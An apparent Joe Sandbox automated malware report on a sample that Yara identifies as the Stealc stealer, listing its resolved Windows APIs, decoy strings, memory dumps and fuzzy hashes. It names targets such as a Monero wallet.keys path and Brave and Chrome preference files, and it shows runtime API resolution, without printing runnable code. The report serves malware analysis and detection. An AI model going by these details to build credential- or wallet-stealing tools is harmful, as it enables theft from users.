Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1436762583.0000000004D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1663758105.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4%
Total number of Nodes:	2000
Total number of Limit Nodes:	37

Executed Functions

Function 003D9860 Relevance: 65.0, APIs: 33, Strings: 4, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75550000,00EB0618), ref: 003D98A1
GetProcAddress.KERNEL32(75550000,00EB0558), ref: 003D98BA
GetProcAddress.KERNEL32(75550000,00EB05A0), ref: 003D98D2
GetProcAddress.KERNEL32(75550000,00EB0810), ref: 003D98EA
GetProcAddress.KERNEL32(75550000,00EB0570), ref: 003D9903
GetProcAddress.KERNEL32(75550000,00EB88B0), ref: 003D991B
GetProcAddress.KERNEL32(75550000,00EA67E0), ref: 003D9933
GetProcAddress.KERNEL32(75550000,00EA69C0), ref: 003D994C
GetProcAddress.KERNEL32(75550000,00EB0648), ref: 003D9964
GetProcAddress.KERNEL32(75550000,00EB07C8), ref: 003D997C
GetProcAddress.KERNEL32(75550000,00EB0708), ref: 003D9995
GetProcAddress.KERNEL32(75550000,00EB07E0), ref: 003D99AD
GetProcAddress.KERNEL32(75550000,00EA6820), ref: 003D99C5
GetProcAddress.KERNEL32(75550000,00EB0660), ref: 003D99DE
GetProcAddress.KERNEL32(75550000,00EB0690), ref: 003D99F6
GetProcAddress.KERNEL32(75550000,00EA68C0), ref: 003D9A0E
GetProcAddress.KERNEL32(75550000,00EB07F8), ref: 003D9A27
GetProcAddress.KERNEL32(75550000,00EB08D0), ref: 003D9A3F
GetProcAddress.KERNEL32(75550000,00EA69E0), ref: 003D9A57
GetProcAddress.KERNEL32(75550000,00EB08B8), ref: 003D9A70
GetProcAddress.KERNEL32(75550000,00EA6700), ref: 003D9A88
LoadLibraryA.KERNEL32(00EB08A0,?,003D6A00), ref: 003D9A9A
LoadLibraryA.KERNEL32(00EB08E8,?,003D6A00), ref: 003D9AAB
LoadLibraryA.KERNEL32(00EB0900,?,003D6A00), ref: 003D9ABD
LoadLibraryA.KERNEL32(00EB0858,?,003D6A00), ref: 003D9ACF
LoadLibraryA.KERNEL32(00EB0918,?,003D6A00), ref: 003D9AE0
GetProcAddress.KERNEL32(75670000,00EB0888), ref: 003D9B02
GetProcAddress.KERNEL32(75750000,00EB0870), ref: 003D9B23
GetProcAddress.KERNEL32(75750000,00EB8DF0), ref: 003D9B3B
GetProcAddress.KERNEL32(76BE0000,00EB8EE0), ref: 003D9B5D
GetProcAddress.KERNEL32(759D0000,00EA67A0), ref: 003D9B7E
GetProcAddress.KERNEL32(773F0000,00EB89E0), ref: 003D9B9F
GetProcAddress.KERNEL32(773F0000,NtQueryInformationProcess), ref: 003D9BB6

Strings

g, xrefs: 003D9926
i, xrefs: 003D9A4A
h, xrefs: 003D99B8
NtQueryInformationProcess, xrefs: 003D9BAA

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: h$NtQueryInformationProcess$g$i
API String ID: 2238633743-2331241300
Opcode ID: f7f64bb08d55fdc157f6f47197bb236332026d57b89fa6c4699a23fa2dca3c78
Instruction ID: 4bac69f630e5d51d4f3c4832c1a6b039407da07100db837192906bd43b5a79c1
Opcode Fuzzy Hash: f7f64bb08d55fdc157f6f47197bb236332026d57b89fa6c4699a23fa2dca3c78
Instruction Fuzzy Hash: BFA10BBA5903409FD345EFE8FD88AA737FBF74C381714A61AE605C3264E6399841CB52

Function 003C45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 003C460E
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 003C479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C45C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C46AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C45DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C45F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C46B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C45D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C45E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C46CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C46D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C46C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4678

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: 4e787487b049b8602d502304f8a0d0ae1b43d080199f665b038aa219b5daa387
Instruction ID: e2aa4d1dee76dcc4c6fc3cd61eb6cb1b16ba2855fecefb0f804e4c1cf8393093
Opcode Fuzzy Hash: 4e787487b049b8602d502304f8a0d0ae1b43d080199f665b038aa219b5daa387
Instruction Fuzzy Hash: 8E4189206C2695BFE736BBA5AD62EDD7352DF46B4CFC0734AF800926D0CFB065814522

Function 003CBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

FindFirstFileA.KERNEL32(00000000,?,003E0B32,003E0B2B,00000000,?,?,?,003E13F4,003E0B2A), ref: 003CBEF5
StrCmpCA.SHLWAPI(?,003E13F8), ref: 003CBF4D
StrCmpCA.SHLWAPI(?,003E13FC), ref: 003CBF63
FindNextFileA.KERNELBASE(000000FF,?), ref: 003CC7BF
FindClose.KERNEL32(000000FF), ref: 003CC7D1

Strings

\Brave\Preferences, xrefs: 003CC1DB
Google Chrome, xrefs: 003CC634
Preferences, xrefs: 003CC11E
Brave, xrefs: 003CC102

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 086e2c228e1f3b66318bbd8bdfddab80ad3fd079bad1fa2695769f84752d09c6
Instruction ID: 2167639c8c5853d8ff2ae90a705a8a4e41597c4eeeef4400199aaa98736f1b7c
Opcode Fuzzy Hash: 086e2c228e1f3b66318bbd8bdfddab80ad3fd079bad1fa2695769f84752d09c6
Instruction Fuzzy Hash: 8B4246739101085BCB16FBB0EE96EEE737DAB54300F404559F90A9A281EF349F49DB92

Function 6CB835A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6CC0F688,00001000), ref: 6CB835D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CB835E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6CB835FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CB8363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CB8369F
__aulldiv.LIBCMT ref: 6CB836E4
QueryPerformanceCounter.KERNEL32(?), ref: 6CB83773
EnterCriticalSection.KERNEL32(6CC0F688), ref: 6CB8377E
LeaveCriticalSection.KERNEL32(6CC0F688), ref: 6CB837BD
QueryPerformanceCounter.KERNEL32(?), ref: 6CB837C4
EnterCriticalSection.KERNEL32(6CC0F688), ref: 6CB837CB
LeaveCriticalSection.KERNEL32(6CC0F688), ref: 6CB83801
__aulldiv.LIBCMT ref: 6CB83883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6CB83902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6CB83918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6CB8394C

Strings

GenuntelineI, xrefs: 6CB83639
MOZ_TIMESTAMP_MODE, xrefs: 6CB835DB
AuthcAMDenti, xrefs: 6CB83946
GTC, xrefs: 6CB83912
QPC, xrefs: 6CB838FC

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 63393b112e9d52e11b9a0ac8031d1b973ae4a2be65476e3921ad2a306828b88c
Instruction ID: 36dd727715c7915db27aab8bea02e99a919df462e212229de36b12a5b34689bd
Opcode Fuzzy Hash: 63393b112e9d52e11b9a0ac8031d1b973ae4a2be65476e3921ad2a306828b88c
Instruction Fuzzy Hash: 79B1F671B093409FDB08DF28C85561ABBF5FB8A704F068A2DE899D3390D772D941CB96

Function 003D4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 003D492C
FindFirstFileA.KERNEL32(?,?), ref: 003D4943
StrCmpCA.SHLWAPI(?,003E0FDC), ref: 003D4971
StrCmpCA.SHLWAPI(?,003E0FE0), ref: 003D4987
FindNextFileA.KERNEL32(000000FF,?), ref: 003D4B7D
FindClose.KERNEL32(000000FF), ref: 003D4B92

Strings

%s\%s, xrefs: 003D49A4
%s\*, xrefs: 003D4920
%s\%s, xrefs: 003D49FB

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
